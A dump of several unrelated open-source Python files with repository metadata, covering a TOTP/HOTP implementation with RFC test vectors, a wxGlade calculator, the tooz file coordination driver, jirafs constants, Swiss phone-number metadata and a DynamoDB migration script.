return calc_hotp(secretkey, struct.pack(">Q", timecounter), codelen, hashfunc)
# HMAC-based One-Time Password algorithm (RFC 4226)
def calc_hotp(
secretkey: bytes,
counter: bytes,
codelen: int = 6,
hashfunc = hashlib.sha1,
) -> str:
# Check arguments
assert isinstance(secretkey, (bytes, bytearray))
assert isinstance(counter , (bytes, bytearray))
assert isinstance(codelen , int) and 1 <= codelen <= 9
# Calculate HMAC
hasher = hmac.new(secretkey, counter, hashfunc)
hash: bytes = hasher.digest()
# Dynamically truncate the hash value
offset: int = hash[-1] % 16
extracted: bytes = hash[offset : offset + 4]
val: int = struct.unpack(">I", extracted)[0]
val %= 2**31
# Extract and format base-10 digits
val %= 10**codelen
return str(val).zfill(codelen)
# Calculates TOTP for the most popular configuration:
# epoch=0, timestep=30, hashfunc=hashlib.sha1, codelen=6.
def calc_totp_compact_default(secretkey: bytes) -> str:
count = struct.pack(">Q", int(time.time()) // 30)
hash = hmac.new(secretkey, count, hashlib.sha1).digest()
offset = hash[-1] % 16
val, = struct.unpack(">I", hash[offset : offset + 4])
return str(val % 2**31 % 10**6).zfill(6)
# ---- Test suite ----
class TotpTest(unittest.TestCase):
def test_hotp(self) -> None:
CASES: List[Tuple[int,str]] = [
(0, "284755224"),
(1, "094287082"),
(2, "137359152"),
(3, "726969429"),
(4, "640338314"),
(5, "868254676"),
(6, "918287922"),
(7, "082162583"),
(8, "673399871"),
(9, "645520489"),
]
SECRET_KEY: bytes = b"12345678901234567890"
for cs in CASES:
actual = calc_hotp(SECRET_KEY, struct.pack(">Q", cs[0]), 9, hashlib.sha1)
self.assertEqual(cs[1], actual)
def test_totp(self) -> None:
CASES: List[Tuple[int,str,str,str]] = [
( 59, "94287082", "46119246", "90693936"),
( 1111111109, "07081804", "68084774", "25091201"),
( 1111111111, "14050471", "67062674", "99943326"),
( 1234567890, "89005924", "91819424", "93441116"),
( 2000000000, "69279037", "90698825", "38618901"),
(20000000000, "65353130", "77737706", "47863826"),
]
SECRET_KEYS: List[bytes] = [
b"12345678901234567890",
b"12345678901234567890123456789012",
b"1234567890123456789012345678901234567890123456789012345678901234",
]
for cs in CASES:
self.assertEqual(cs[1], calc_totp(SECRET_KEYS[0], 0, 30, cs[0], 8, hashlib.sha1 ))
self.assertEqual(cs[2], calc_totp(SECRET_KEYS[1], 0, 30, cs[0], 8, hashlib.sha256))
self.assertEqual(cs[3], calc_totp(SECRET_KEYS[2], 0, 30, cs[0], 8, hashlib.sha512))
# ---- Main program ----
def main(args: List[str]) -> None:
if len(args) == 0:
unittest.main()
elif len(args) == 1:
keystr: str = args[0].replace(" ", "").upper()
secretkey: bytes = base64.b32decode(keystr)
code: str = calc_totp(secretkey)
assert calc_totp_compact_default(secretkey) == code
print(code)
else:
sys.exit("Usage: python totp.py [SecretKey]")
if __name__ == "__main__":
main(sys.argv[1 : ])
|
539fc15d08bab0e86007c157c564de41b7e29f7b
|
77861deda8b3046bdda221d3cb80b77e84b14523
|
/iterater-over-bits/scripts/print_table.py
|
6c6d91053c5cbd878dd8ab6911c06b938ad97b1d
|
[
"BSD-2-Clause"
] |
permissive
|
WojciechMula/toys
|
b73f09212ca19f1e76bbf2afaa5ad2efcea95175
|
6110b59de45dc1ce44388b21c6437eff49a7655c
|
refs/heads/master
| 2023-08-18T12:54:25.919406
| 2023-08-05T09:20:14
| 2023-08-05T09:20:14
| 14,905,115
| 302
| 44
|
BSD-2-Clause
| 2020-04-17T17:10:42
| 2013-12-03T20:35:37
|
C++
|
UTF-8
|
Python
| false
| false
| 1,855
|
py
|
print_table.py
|
from table import Table
def print_report(path):
table1 = Table()
table2 = Table()
header_common = [
"case",
"size [bits]",
"cardinality [bits]",
"fill factor",
]
table1.set_header(header_common + [
"naive [us]",
"better [us]",
"block-3 [us]",
"block-4 [us]",
])
table2.set_header(header_common + [
"naive [x]",
"better [x]",
"block-3 [x]",
"block-4 [x]",
])
with open(path, 'rt') as f:
prev_name = None
for line in f:
F = line.split(',')
assert(len(F) == 7)
if F[0] == prev_name:
name = ""
else:
name = F[0]
prev_name = name
size = int(F[1])
cardinality = int(F[2])
fill_factor = float(cardinality)/size
naive_time = int(F[3])
better_time = int(F[4])
block3_time = int(F[5])
block4_time = int(F[6])
row_common = [
name,
'%d' % size,
'%d' % cardinality,
'%0.2f' % fill_factor,
]
table1.add_row(row_common + [
format(naive_time, ",d"),
format(better_time, ",d"),
format(block3_time, ",d"),
format(block4_time, ",d"),
])
table2.add_row(row_common + [
"%0.2f" % (float(naive_time)/naive_time),
"%0.2f" % (float(naive_time)/better_time),
"%0.2f" % (float(naive_time)/block3_time),
"%0.2f" % (float(naive_time)/block4_time),
])
print table1
print
print table2
if __name__ == '__main__':
import sys
print_report(sys.argv[1])
|
c3f1b08b2731cc1e55cf904527c85b973c6f2ec4
|
d7697a668e560e0447bc2844baa48d747cf1e70b
|
/examples/Calculator/Calculator.py
|
c66ee732b2cdea6ec2cc3d2640a6fd49e01e11e9
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-unknown-license-reference",
"WxWindows-exception-3.1",
"LGPL-2.0-or-later"
] |
permissive
|
wxGlade/wxGlade
|
4bdfb98ea305163fa2187c0a59dd8e8612974163
|
828515e217c4733d38c57ed88d853e983a2008f2
|
refs/heads/master
| 2023-09-01T15:49:41.152236
| 2023-08-26T16:34:36
| 2023-08-26T16:34:36
| 126,486,431
| 275
| 59
|
MIT
| 2023-05-02T18:27:53
| 2018-03-23T13:06:05
|
Python
|
UTF-8
|
Python
| false
| false
| 4,045
|
py
|
Calculator.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# generated by wxGlade 0.8.0a6 on Thu Nov 02 22:44:22 2017
#
import wx
# begin wxGlade: dependencies
# end wxGlade
# begin wxGlade: extracode
# end wxGlade
class CalculatorFrame(wx.Frame):
def __init__(self, *args, **kwds):
# begin wxGlade: CalculatorFrame.__init__
kwds["style"] = kwds.get("style", 0) | wx.DEFAULT_FRAME_STYLE
wx.Frame.__init__(self, *args, **kwds)
self.SetSize((400, 300))
self.SetTitle("Calculator")
self.panel_1 = wx.Panel(self, wx.ID_ANY)
sizer_1 = wx.BoxSizer(wx.VERTICAL)
sizer_2 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1.Add(sizer_2, 0, wx.ALL | wx.EXPAND, 4)
label_1 = wx.StaticText(self.panel_1, wx.ID_ANY, "Value 1:")
sizer_2.Add(label_1, 0, wx.ALIGN_CENTER_VERTICAL, 0)
self.text_value1 = wx.TextCtrl(self.panel_1, wx.ID_ANY, "")
sizer_2.Add(self.text_value1, 1, 0, 0)
sizer_3 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1.Add(sizer_3, 0, wx.ALL | wx.EXPAND, 4)
label_4 = wx.StaticText(self.panel_1, wx.ID_ANY, "Operator:")
sizer_3.Add(label_4, 0, wx.ALIGN_CENTER_VERTICAL, 0)
self.radiobox_operator = wx.RadioBox(self.panel_1, wx.ID_ANY, "", choices=["+", "-", "*", "/"], majorDimension=1, style=wx.RA_SPECIFY_ROWS)
self.radiobox_operator.SetSelection(0)
sizer_3.Add(self.radiobox_operator, 0, 0, 0)
sizer_4 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1.Add(sizer_4, 0, wx.ALL | wx.EXPAND, 4)
label_2 = wx.StaticText(self.panel_1, wx.ID_ANY, "Value 2:")
sizer_4.Add(label_2, 0, wx.ALIGN_CENTER_VERTICAL, 0)
self.text_value2 = wx.TextCtrl(self.panel_1, wx.ID_ANY, "")
sizer_4.Add(self.text_value2, 1, 0, 0)
static_line_1 = wx.StaticLine(self.panel_1, wx.ID_ANY)
sizer_1.Add(static_line_1, 0, wx.BOTTOM | wx.EXPAND | wx.TOP, 5)
sizer_5 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1.Add(sizer_5, 1, wx.ALL | wx.EXPAND, 4)
label_3 = wx.StaticText(self.panel_1, wx.ID_ANY, "Result:")
sizer_5.Add(label_3, 0, 0, 0)
self.text_result = wx.TextCtrl(self.panel_1, wx.ID_ANY, "", style=wx.TE_MULTILINE | wx.TE_READONLY)
self.text_result.SetBackgroundColour(wx.Colour(212, 208, 200))
sizer_5.Add(self.text_result, 1, wx.EXPAND, 0)
sizer_6 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1.Add(sizer_6, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
self.button_execute = wx.Button(self.panel_1, wx.ID_ANY, "Execute")
self.button_execute.SetDefault()
sizer_6.Add(self.button_execute, 0, wx.ALL, 5)
self.button_reset = wx.Button(self.panel_1, wx.ID_ANY, "Reset")
sizer_6.Add(self.button_reset, 0, wx.ALL, 5)
self.panel_1.SetSizer(sizer_1)
self.Layout()
self.Bind(wx.EVT_BUTTON, self.on_execute_button_clicked, self.button_execute)
self.Bind(wx.EVT_BUTTON, self.on_reset_button_clicked, self.button_reset)
# end wxGlade
def on_execute_button_clicked(self, event): # wxGlade: CalculatorFrame.<event_handler>
value1 = float( self.text_value1.GetValue() )
value2 = float( self.text_value2.GetValue() )
operator = self.radiobox_operator.GetSelection() # a number from 0 to 3
if operator==0: result = value1 + value2
elif operator==1: result = value1 - value2
elif operator==2: result = value1 * value2
elif operator==3: result = value1 / value2
self.text_result.AppendText("%s\n"%result)
event.Skip()
def on_reset_button_clicked(self, event): # wxGlade: CalculatorFrame.<event_handler>
self.text_result.Clear()
event.Skip()
# end of class CalculatorFrame
class MyApp(wx.App):
def OnInit(self):
self.frame = CalculatorFrame(None, wx.ID_ANY, "")
self.SetTopWindow(self.frame)
self.frame.Show()
return True
# end of class MyApp
if __name__ == "__main__":
app = MyApp(0)
app.MainLoop()
|
d5d55431cdf55dd6af490769a3faa966ad4c622d
|
32c61e92b792c3572287033ef5051fd67ef9c912
|
/tooz/drivers/file.py
|
eb26eb0d69534378e61746521b7f51623b6eddc8
|
[
"Apache-2.0"
] |
permissive
|
openstack/tooz
|
8095697e973635f49e104a0bbc8e34e2231a3b91
|
702ea408b2d5c2b2ee27d56d4eeef1ce0263a1b9
|
refs/heads/master
| 2023-09-02T07:29:42.602556
| 2023-08-11T11:10:40
| 2023-08-11T11:10:40
| 14,909,684
| 115
| 64
|
Apache-2.0
| 2018-03-05T21:15:45
| 2013-12-04T00:18:39
|
Python
|
UTF-8
|
Python
| false
| false
| 20,558
|
py
|
file.py
|
# -*- coding: utf-8 -*-
#
# Copyright © 2015 eNovance
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import datetime
import errno
import functools
import hashlib
import logging
import os
import re
import shutil
import sys
import tempfile
import threading
import weakref
import fasteners
from oslo_utils import encodeutils
from oslo_utils import fileutils
from oslo_utils import timeutils
import voluptuous
import tooz
from tooz import coordination
from tooz import locking
from tooz import utils
LOG = logging.getLogger(__name__)
class _Barrier(object):
def __init__(self):
self.cond = threading.Condition()
self.owner = None
self.shared = False
self.ref = 0
@contextlib.contextmanager
def _translate_failures():
try:
yield
except (EnvironmentError, voluptuous.Invalid) as e:
utils.raise_with_cause(tooz.ToozError,
encodeutils.exception_to_unicode(e),
cause=e)
def _convert_from_old_format(data):
# NOTE(sileht): previous version of the driver was storing str as-is
# making impossible to read from python3 something written with python2
# version of the lib.
# Now everything is stored with explicit type bytes or unicode. This
# convert the old format to the new one to maintain compat of already
# deployed file.
# example of potential old python2 payload:
# {b"member_id": b"member"}
# {b"member_id": u"member"}
# example of potential old python3 payload:
# {u"member_id": b"member"}
# {u"member_id": u"member"}
if b"member_id" in data or b"group_id" in data:
data = dict((k.decode("utf8"), v) for k, v in data.items())
# About member_id and group_id valuse if the file have been written
# with python2 and in the old format, we can't known with python3
# if we need to decode the value or not. Python3 see bytes blob
# We keep it as-is and pray, this have a good change to break if
# the application was using str in python2 and unicode in python3
# The member file is often overridden so it's should be fine
# But the group file can be very old, so we
# now have to update it each time create_group is called
return data
def _lock_me(lock):
def wrapper(func):
@functools.wraps(func)
def decorator(*args, **kwargs):
with lock:
return func(*args, **kwargs)
return decorator
return wrapper
class FileLock(locking.Lock):
"""A file based lock."""
def __init__(self, path, barrier, member_id):
super(FileLock, self).__init__(path)
self.acquired = False
self._lock = fasteners.InterProcessLock(path)
self._barrier = barrier
self._member_id = member_id
self.ref = 0
def is_still_owner(self):
return self.acquired
def acquire(self, blocking=True, shared=False):
blocking, timeout = utils.convert_blocking(blocking)
watch = timeutils.StopWatch(duration=timeout)
watch.start()
# Make the shared barrier ours first.
with self._barrier.cond:
while self._barrier.owner is not None:
if (shared and self._barrier.shared):
break
if not blocking or watch.expired():
return False
self._barrier.cond.wait(watch.leftover(return_none=True))
self._barrier.owner = (threading.current_thread().ident,
os.getpid(), self._member_id)
self._barrier.shared = shared
self._barrier.ref += 1
self.ref += 1
# Ok at this point we are now working in a thread safe manner,
# and now we can try to get the actual lock...
gotten = False
try:
gotten = self._lock.acquire(
blocking=blocking,
# Since the barrier waiting may have
# taken a long time, we have to use
# the leftover (and not the original).
timeout=watch.leftover(return_none=True))
finally:
# NOTE(harlowja): do this in a finally block to **ensure** that
# we release the barrier if something bad happens...
if not gotten:
# Release the barrier to let someone else have a go at it...
with self._barrier.cond:
self._barrier.owner = None
self._barrier.ref = 0
self._barrier.shared = False
self._barrier.cond.notify_all()
self.acquired = gotten
return gotten
def release(self):
if not self.acquired:
return False
with self._barrier.cond:
self._barrier.ref -= 1
self.ref -= 1
if not self.ref:
self.acquired = False
if not self._barrier.ref:
self._barrier.owner = None
self._lock.release()
self._barrier.cond.notify_all()
return True
def __del__(self):
if self.acquired:
LOG.warning("Unreleased lock %s garbage collected", self.name)
class FileDriver(coordination.CoordinationDriverCachedRunWatchers,
coordination.CoordinationDriverWithExecutor):
"""A file based driver.
This driver uses files and directories (and associated file locks) to
provide the coordination driver semantics and required API(s). It **is**
missing some functionality but in the future these not implemented API(s)
will be filled in.
The File driver connection URI should look like::
file://DIRECTORY[?timeout=TIMEOUT]
DIRECTORY is the location that should be used to store lock files.
TIMEOUT defaults to 10.
General recommendations/usage considerations:
- It does **not** automatically delete members from
groups of processes that have died, manual cleanup will be needed
for those types of failures.
- It is **not** distributed (or recommended to be used in those
situations, so the developer using this should really take that into
account when applying this driver in there app).
"""
CHARACTERISTICS = (
coordination.Characteristics.NON_TIMEOUT_BASED,
coordination.Characteristics.DISTRIBUTED_ACROSS_THREADS,
coordination.Characteristics.DISTRIBUTED_ACROSS_PROCESSES,
)
"""
Tuple of :py:class:`~tooz.coordination.Characteristics` introspectable
enum member(s) that can be used to interogate how this driver works.
"""
HASH_ROUTINE = 'sha1'
"""This routine is used to hash a member (or group) id into a filesystem
safe name that can be used for member lookup and group joining."""
_barriers = weakref.WeakValueDictionary()
"""
Barriers shared among all file driver locks, this is required
since interprocess locking is not thread aware, so we must add the
thread awareness on-top of it instead.
"""
def __init__(self, member_id, parsed_url, options):
"""Initialize the file driver."""
super(FileDriver, self).__init__(member_id, parsed_url, options)
self._dir = self._normalize_path(parsed_url.path)
self._group_dir = os.path.join(self._dir, 'groups')
self._tmpdir = os.path.join(self._dir, 'tmp')
self._driver_lock_path = os.path.join(self._dir, '.driver_lock')
self._driver_lock = self._get_raw_lock(self._driver_lock_path,
self._member_id)
self._reserved_dirs = [self._dir, self._group_dir, self._tmpdir]
self._reserved_paths = list(self._reserved_dirs)
self._reserved_paths.append(self._driver_lock_path)
self._safe_member_id = self._make_filesystem_safe(member_id)
self._timeout = int(self._options.get('timeout', 10))
@staticmethod
def _normalize_path(path):
if sys.platform == 'win32':
# Replace slashes with backslashes and make sure we don't
# have any at the beginning of paths that include drive letters.
#
# Expected url format:
# file:////share_address/share_name
# file:///C:/path
return re.sub(r'\\(?=\w:\\)', '',
os.path.normpath(path))
return path
@classmethod
def _get_raw_lock(cls, path, member_id):
lock_barrier = cls._barriers.setdefault(path, _Barrier())
return FileLock(path, lock_barrier, member_id)
def get_lock(self, name):
path = utils.safe_abs_path(self._dir, name.decode())
if path in self._reserved_paths:
raise ValueError("Unable to create a lock using"
" reserved path '%s' for lock"
" with name '%s'" % (path, name))
return self._get_raw_lock(path, self._member_id)
@classmethod
def _make_filesystem_safe(cls, item):
item = utils.to_binary(item, encoding="utf8")
return hashlib.new(cls.HASH_ROUTINE, item).hexdigest()
def _start(self):
super(FileDriver, self)._start()
for a_dir in self._reserved_dirs:
try:
fileutils.ensure_tree(a_dir)
except OSError as e:
raise coordination.ToozConnectionError(e)
def _update_group_metadata(self, path, group_id):
details = {
u'group_id': utils.to_binary(group_id, encoding="utf8")
}
details[u'encoded'] = details[u"group_id"] != group_id
details_blob = utils.dumps(details)
fd, name = tempfile.mkstemp("tooz", dir=self._tmpdir)
with os.fdopen(fd, "wb") as fh:
fh.write(details_blob)
os.rename(name, path)
def create_group(self, group_id):
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
group_meta_path = os.path.join(group_dir, '.metadata')
def _do_create_group():
if os.path.exists(os.path.join(group_dir, ".metadata")):
# NOTE(sileht): We update the group metadata even
# they are already good, so ensure dict key are convert
# to unicode in case of the file have been written with
# tooz < 1.36
self._update_group_metadata(group_meta_path, group_id)
raise coordination.GroupAlreadyExist(group_id)
else:
fileutils.ensure_tree(group_dir)
self._update_group_metadata(group_meta_path, group_id)
fut = self._executor.submit(_do_create_group)
return FileFutureResult(fut)
def join_group(self, group_id, capabilities=b""):
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
me_path = os.path.join(group_dir, "%s.raw" % self._safe_member_id)
@_lock_me(self._driver_lock)
def _do_join_group():
if not os.path.exists(os.path.join(group_dir, ".metadata")):
raise coordination.GroupNotCreated(group_id)
if os.path.isfile(me_path):
raise coordination.MemberAlreadyExist(group_id,
self._member_id)
details = {
u'capabilities': capabilities,
u'joined_on': datetime.datetime.now(),
u'member_id': utils.to_binary(self._member_id,
encoding="utf-8")
}
details[u'encoded'] = details[u"member_id"] != self._member_id
details_blob = utils.dumps(details)
with open(me_path, "wb") as fh:
fh.write(details_blob)
self._joined_groups.add(group_id)
fut = self._executor.submit(_do_join_group)
return FileFutureResult(fut)
def leave_group(self, group_id):
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
me_path = os.path.join(group_dir, "%s.raw" % self._safe_member_id)
@_lock_me(self._driver_lock)
def _do_leave_group():
if not os.path.exists(os.path.join(group_dir, ".metadata")):
raise coordination.GroupNotCreated(group_id)
try:
os.unlink(me_path)
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
else:
raise coordination.MemberNotJoined(group_id,
self._member_id)
else:
self._joined_groups.discard(group_id)
fut = self._executor.submit(_do_leave_group)
return FileFutureResult(fut)
_SCHEMAS = {
'group': voluptuous.Schema({
voluptuous.Required('group_id'): voluptuous.Any(str, bytes),
# NOTE(sileht): tooz <1.36 was creating file without this
voluptuous.Optional('encoded'): bool,
}),
'member': voluptuous.Schema({
voluptuous.Required('member_id'): voluptuous.Any(str, bytes),
voluptuous.Required('joined_on'): datetime.datetime,
# NOTE(sileht): tooz <1.36 was creating file without this
voluptuous.Optional('encoded'): bool,
}, extra=voluptuous.ALLOW_EXTRA),
}
def _load_and_validate(self, blob, schema_key):
data = utils.loads(blob)
data = _convert_from_old_format(data)
schema = self._SCHEMAS[schema_key]
return schema(data)
def _read_member_id(self, path):
with open(path, 'rb') as fh:
details = self._load_and_validate(fh.read(), 'member')
if details.get("encoded"):
return details[u'member_id'].decode("utf-8")
return details[u'member_id']
def get_members(self, group_id):
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
@_lock_me(self._driver_lock)
def _do_get_members():
if not os.path.isdir(group_dir):
raise coordination.GroupNotCreated(group_id)
members = set()
try:
entries = os.listdir(group_dir)
except EnvironmentError as e:
# Did someone manage to remove it before we got here...
if e.errno != errno.ENOENT:
raise
else:
for entry in entries:
if not entry.endswith('.raw'):
continue
entry_path = os.path.join(group_dir, entry)
try:
m_time = datetime.datetime.fromtimestamp(
os.stat(entry_path).st_mtime)
current_time = datetime.datetime.now()
delta_time = timeutils.delta_seconds(m_time,
current_time)
if delta_time >= 0 and delta_time <= self._timeout:
member_id = self._read_member_id(entry_path)
else:
continue
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
else:
members.add(member_id)
return members
fut = self._executor.submit(_do_get_members)
return FileFutureResult(fut)
def get_member_capabilities(self, group_id, member_id):
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
safe_member_id = self._make_filesystem_safe(member_id)
member_path = os.path.join(group_dir, "%s.raw" % safe_member_id)
@_lock_me(self._driver_lock)
def _do_get_member_capabilities():
try:
with open(member_path, "rb") as fh:
contents = fh.read()
except EnvironmentError as e:
if e.errno == errno.ENOENT:
if not os.path.isdir(group_dir):
raise coordination.GroupNotCreated(group_id)
else:
raise coordination.MemberNotJoined(group_id,
member_id)
else:
raise
else:
details = self._load_and_validate(contents, 'member')
return details.get(u"capabilities")
fut = self._executor.submit(_do_get_member_capabilities)
return FileFutureResult(fut)
def delete_group(self, group_id):
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
@_lock_me(self._driver_lock)
def _do_delete_group():
try:
entries = os.listdir(group_dir)
except EnvironmentError as e:
if e.errno == errno.ENOENT:
raise coordination.GroupNotCreated(group_id)
else:
raise
else:
if len(entries) > 1:
raise coordination.GroupNotEmpty(group_id)
elif len(entries) == 1 and entries != ['.metadata']:
raise tooz.ToozError(
"Unexpected path '%s' found in"
" group directory '%s' (expected to only find"
" a '.metadata' path)" % (entries[0], group_dir))
else:
try:
shutil.rmtree(group_dir)
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
fut = self._executor.submit(_do_delete_group)
return FileFutureResult(fut)
def _read_group_id(self, path):
with open(path, 'rb') as fh:
details = self._load_and_validate(fh.read(), 'group')
if details.get("encoded"):
return details[u'group_id'].decode("utf-8")
return details[u'group_id']
def get_groups(self):
def _do_get_groups():
groups = []
for entry in os.listdir(self._group_dir):
path = os.path.join(self._group_dir, entry, '.metadata')
try:
groups.append(self._read_group_id(path))
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
return groups
fut = self._executor.submit(_do_get_groups)
return FileFutureResult(fut)
def heartbeat(self):
for group_id in self._joined_groups:
safe_group_id = self._make_filesystem_safe(group_id)
group_dir = os.path.join(self._group_dir, safe_group_id)
member_path = os.path.join(group_dir, "%s.raw" %
self._safe_member_id)
@_lock_me(self._driver_lock)
def _do_heartbeat():
try:
os.utime(member_path, None)
except EnvironmentError as err:
if err.errno != errno.ENOENT:
raise
_do_heartbeat()
return self._timeout
@staticmethod
def watch_elected_as_leader(group_id, callback):
raise tooz.NotImplemented
@staticmethod
def unwatch_elected_as_leader(group_id, callback):
raise tooz.NotImplemented
FileFutureResult = functools.partial(coordination.CoordinatorResult,
failure_translator=_translate_failures)
|
6076246eea3c58921fd70e51f98880739a69b229
|
eaba398a0ca5414c10dd1890e662fdcd87e157b6
|
/jirafs/constants.py
|
ccf01bc46d7b981db0b5986970f7fe40661ef465
|
[
"MIT"
] |
permissive
|
coddingtonbear/jirafs
|
a78f47e59836d9a6024bc287ea2a1247fb297e62
|
778cba9812f99eeaf726a77c1bca5ae2650a35e9
|
refs/heads/development
| 2023-06-16T00:06:33.262635
| 2022-09-20T04:06:26
| 2022-09-20T04:06:26
| 21,588,191
| 125
| 17
|
MIT
| 2023-06-02T05:48:53
| 2014-07-07T21:54:20
|
Python
|
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
constants.py
|
from environmental_override import override # noqa
from jirafs import __version__ as version
# Metadata filenames
TICKET_DETAILS = "fields.jira"
TICKET_COMMENTS = "comments.read_only.jira"
TICKET_NEW_COMMENT = "new_comment.jira"
TICKET_LINKS = "links.jira"
TICKET_FILE_FIELD_TEMPLATE = "{field_name}.jira"
# Generic settings
LOCAL_ONLY_FILE = ".jirafs_local"
REMOTE_IGNORE_FILE = ".jirafs_remote_ignore"
GIT_IGNORE_FILE_PARTIAL = ".jirafs_ignore"
GIT_IGNORE_FILE = ".jirafs/combined_ignore"
GIT_EXCLUDE_FILE = ".jirafs/git/info/exclude"
TICKET_OPERATION_LOG = "operation.log"
METADATA_DIR = ".jirafs"
GLOBAL_CONFIG = ".jirafs_config"
TEMP_GENERATED_FILES = ".jirafs/temp-generated"
GIT_AUTHOR = "Jirafs %s <jirafs@localhost>" % (version)
DEFAULT_BRANCH = "master"
# Config sections
CONFIG_JIRA = "jira"
CONFIG_MAIN = "main"
CONFIG_PLUGINS = "plugins"
NO_DETAIL_FIELDS = ["comment", "watches", "attachment"]
FILE_FIELDS = [
"description",
]
FILE_FIELD_BLACKLIST = [
"new_comment",
"fields",
"links",
]
ALLOW_USER_INPUT = True
DEFAULT_DATE_FORMAT = "%Y-%m-%d at %H:%M:%S %Z"
CURRENT_REPO_VERSION = 17
override(locals(), "JIRAFS_")
|
54bdc47a07f8a9a25488feab898ab7c3c1cb78ad
|
54292bb222c6525217458e92ddacfc4e2635b83e
|
/python/phonenumbers/data/region_CH.py
|
dba35cd8d469d5ee52182ec221c26f9b73165b56
|
[
"Apache-2.0"
] |
permissive
|
daviddrysdale/python-phonenumbers
|
0d69b48033d1464c0a6c358274062f1db2ee8c4a
|
2f06ef6db2ca83f3856fbb8019a0c665f5971b13
|
refs/heads/dev
| 2023-08-31T09:37:20.570690
| 2023-08-22T05:18:22
| 2023-08-22T05:18:22
| 1,643,611
| 2,944
| 406
|
Apache-2.0
| 2023-08-08T06:49:07
| 2011-04-21T03:06:38
|
Python
|
UTF-8
|
Python
| false
| false
| 2,072
|
py
|
region_CH.py
|
"""Auto-generated file, do not edit by hand. CH metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_CH = PhoneMetadata(id='CH', country_code=41, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='8\\d{11}|[2-9]\\d{8}', possible_length=(9, 12)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:2[12467]|3[1-4]|4[134]|5[256]|6[12]|[7-9]1)\\d{7}', example_number='212345678', possible_length=(9,)),
mobile=PhoneNumberDesc(national_number_pattern='7[35-9]\\d{7}', example_number='781234567', possible_length=(9,)),
toll_free=PhoneNumberDesc(national_number_pattern='800\\d{6}', example_number='800123456', possible_length=(9,)),
premium_rate=PhoneNumberDesc(national_number_pattern='90[016]\\d{6}', example_number='900123456', possible_length=(9,)),
shared_cost=PhoneNumberDesc(national_number_pattern='84[0248]\\d{6}', example_number='840123456', possible_length=(9,)),
personal_number=PhoneNumberDesc(national_number_pattern='878\\d{6}', example_number='878123456', possible_length=(9,)),
pager=PhoneNumberDesc(national_number_pattern='74[0248]\\d{6}', example_number='740123456', possible_length=(9,)),
uan=PhoneNumberDesc(national_number_pattern='5[18]\\d{7}', example_number='581234567', possible_length=(9,)),
voicemail=PhoneNumberDesc(national_number_pattern='860\\d{9}', example_number='860123456789', possible_length=(12,)),
national_prefix='0',
national_prefix_for_parsing='0',
number_format=[NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['8[047]|90'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{2})(\\d{2})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['[2-79]|81'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{3})(\\d{2})(\\d{3})(\\d{2})(\\d{2})', format='\\1 \\2 \\3 \\4 \\5', leading_digits_pattern=['8'], national_prefix_formatting_rule='0\\1')],
mobile_number_portable_region=True)
|
a4bbf0c32df36a852e893b3d284566f37eb23c88
|
bba97d00eba0c3de8a081e61ed6711f138d6babd
|
/scripts/db_migration/update_build_items.py
|
4258008c0e0c9db7aa6425c8cdab5b83a9d97eb7
|
[
"Apache-2.0"
] |
permissive
|
keithrozario/Klayers
|
a6df271a7f72c8b2ae9d2025ff030cff09bd5b75
|
026ebed4a3de0018418638e37d6453253aa48f0e
|
refs/heads/master
| 2023-09-04T12:33:32.454360
| 2023-09-04T08:44:18
| 2023-09-04T08:44:18
| 164,266,648
| 1,725
| 276
|
NOASSERTION
| 2023-09-04T08:44:19
| 2019-01-06T01:49:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,122
|
py
|
update_build_items.py
|
"""
Add the package fields to build items.
Derived from the sk field
"""
import boto3
profile = "KlayersProdP38"
# profile = 'KlayersDev'
config = {"table_name": "kl.Klayers-prodp38.db", "region": "us-east-2"}
# config = {'table_name': 'kl.Klayers-devp38.db', 'region': 'us-west-2'}
# config = {'table_name': 'kl.Klayers-defaultp38.db', 'region': 'ap-southeast-1'}
session = boto3.session.Session(profile_name=profile, region_name=config["region"])
dynamodb = session.resource("dynamodb")
table = dynamodb.Table(config["table_name"])
kwargs = {
"Select": "ALL_ATTRIBUTES",
"FilterExpression": Attr("pk").begins_with("bld"),
"ConsistentRead": False,
}
items = list()
while True:
response = table.scan(**kwargs)
items.extend(response["Items"])
try:
kwargs["ExclusiveStartKey"] = response["LastEvaluatedKey"]
except KeyError:
break
with table.batch_writer() as batch:
for k, item in enumerate(items):
item["pckg"] = item["sk"][5:]
batch.put_item(Item=item)
